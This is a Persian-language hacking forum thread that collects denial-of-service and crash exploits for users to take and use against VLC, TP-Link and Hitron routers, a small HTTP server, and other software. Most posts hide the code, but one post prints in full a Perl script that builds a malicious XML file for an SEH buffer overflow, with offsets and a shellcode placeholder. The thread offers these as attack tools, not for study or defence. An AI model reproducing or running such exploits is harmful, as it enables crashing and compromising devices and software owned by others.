رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

پست های پیشنهاد شده

سلام خدمت اعضا محترم گارد ایران.

بنا به درخواست کاربران بر این آمدم که تاتپیک حملات Denial Of Service رو در انجمن قرار بدم تا بقیه کاربران نیز استفاده کنند.

خوب دوستان فقط چندتا نگته در بارهی این اکسپلویت ها عزض کنم.

 

اسن اکپلویت ها برای کرش سخت افزار ها,نرم افزار ها و... اسستفاده میشه که امیدوارم از این تاپیک استقبال بشه.

######################################################

 

قوانین تاپیک:

1-اسپم ممنوع

2-فقط اکسپلویت قرار بدین نه چیز دیگه ای.

3- طرح سوال در بخش مربوطه نه در تاپیک آموزشی

موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


VLC Crasher V2.x.x

 

با این اکسپلویت شما میتوانید نرمک افزار VLC ورژن 2 رو کرش کنید.

فقط کافیه با VLC این اکسپلویت رو اجرا کنید.

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


This is the hidden content, please

شما با اسکریپت python زیر می توانید مودم های TP-Link TL-WR740N / TL-WR740ND - 150M Wireless Lite را مورد حمله ی http قراربدید و پورت 80 مودم رو پر کنید و در نهایت سخت افزار رو کرش کنید.

 

کد استفاده از اکسپلویت:

This is the hidden content, please
This is the hidden content, please
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


داس کردن Static Http Server 1.0

 

شما با این اسکریپت پرل می توانید بر روی Static Http Server 1.0 حمله ی داس انجام بدهید به عبارتی این یه نوع باگ داس است که با این اسکریپت می تونید ازش استفاده کنید.توجه کنید که ورژن 1.0 فقط این باگ رو داره.

 

روش استفاده:

This is the hidden content, please
This is the hidden content, please
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


This is the hidden content, please

این اسکریپت یک فایل با پسوند wav ایجاد میکنه که باعث کرش نرم افزار میشه.

This is the hidden content, please
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


This is the hidden content, please

فایل زیر رو با ابزار مذکور ابز کنید تا کرش بشه.

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


مودم ONO Hitron CDE-30364 Router یک مودم خوب و مشهور است.

اما این مودم در http اش دارای یک باگ است که با استفاده از این باگ ما می تونیم پورت 80 این مودم رو پر کنیم و مودم رو داون کنیم.

 

واسه اینکار براتون یه اسکریپت پایتون گذاشتم. لازم به ذکر بشم فعلا این اسکریپت واسه لوکال است. در صورت انتشار واسه غیر لوکال هاست هم قرار داده می شه.

 


This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


This is the hidden content, please

#!/usr/bin/perl

my $buffsize = 15000; # sets buffer size for consistent sized payload

# build the start of the xml file

my $header = '<?xml version="1.0" ?><Key>key</Key><AriaSetup version="1665">';

$header = $header . '<Property name="vendor" value="Plogue Art et Technologie, Inc"/>';

$header = $header . '<Property name="product" value="';

my $junk = "\x41" x 392; # 392 is the offset of next seh followed by 4920 bytes of controllable data

my $nseh = "\x42\x42\x42\x42"; # overwrite next seh

my $seh = "\x43\x43\x43\x43"; # overwrite seh (and EIP, offset 396)

my $shell = "\x45" x 5000; # placeholder for shell code; also accessible via ESP+2500 (length 4916)

my $sploit = $junk.$nseh.$seh.$nops.$shell; # assemble exploit portion of buffer

my $fill = "\x46" x ($buffsize - (length($header)+length($sploit))); # fill remainder of buffer

my $buffer = $header.$sploit.$fill; # construct the final buffer

# write the exploit buffer to file

my $file = "AriaSetup.xml";

open(FILE, ">$file");

print FILE $buffer;

close(FILE);

print "Exploit file created [" . $file . "]\n";

print "Buffer size: " . length($buffer) . "\n";

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


  • 3 هفته بعد...

 

This is the hidden content, please

توضیحات:

This is the hidden content, please
This is the hidden content, please
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


 


Acrobat Reader DC 15.008.20082.15957 - PDF Parsing Memory Corruption Vulnerability

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


 

This is the hidden content, please

وضعیت:

This is the hidden content, please

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


 


eBay Magento CE <= 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / DoS

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر



FreeType 2.6.1 TrueType tt_sbit_decoder_load_bit_aligned Heap-Based Out-of-Bounds Rea

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

×
×
  • ایجاد مورد جدید...